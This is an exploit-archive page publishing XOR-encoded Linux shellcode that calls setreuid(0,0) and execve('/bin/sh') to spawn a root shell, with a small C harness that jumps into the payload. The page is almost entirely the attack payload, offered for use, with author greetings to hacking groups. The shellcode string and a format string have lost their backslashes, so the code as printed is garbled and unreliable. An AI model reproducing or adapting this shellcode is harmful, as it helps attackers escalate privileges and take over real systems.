62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 62 bytes setreuid(0,0) execve("/bin/sh",NULL,NULL) XOR Encoded Linux Shellcode
# Published : 2010-07-05
# Author : gunslinger_
# Previous Title : Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)
# Next Title : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode

/*
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "xebx11x5ex31xc9xb1x26x80x74x0exffx01"
		   "x80xe9x01x75xf6xebx05xe8xeaxffxffxff"
		   "x30xc1x30xdax30xc8x30xd3xb1x47x30xda"
		   "x30xc8xccx81xb1x0ax52x69x2ex2ex72x69"
		   "x69x2ex63x68x6fx88xe2x30xc8x30xc8x52"
		   "xccx81";
		
int main(void)
{
	fprintf(stdout,"Length: %dn",strlen(shellcode));
	(*(void(*)()) shellcode)();
}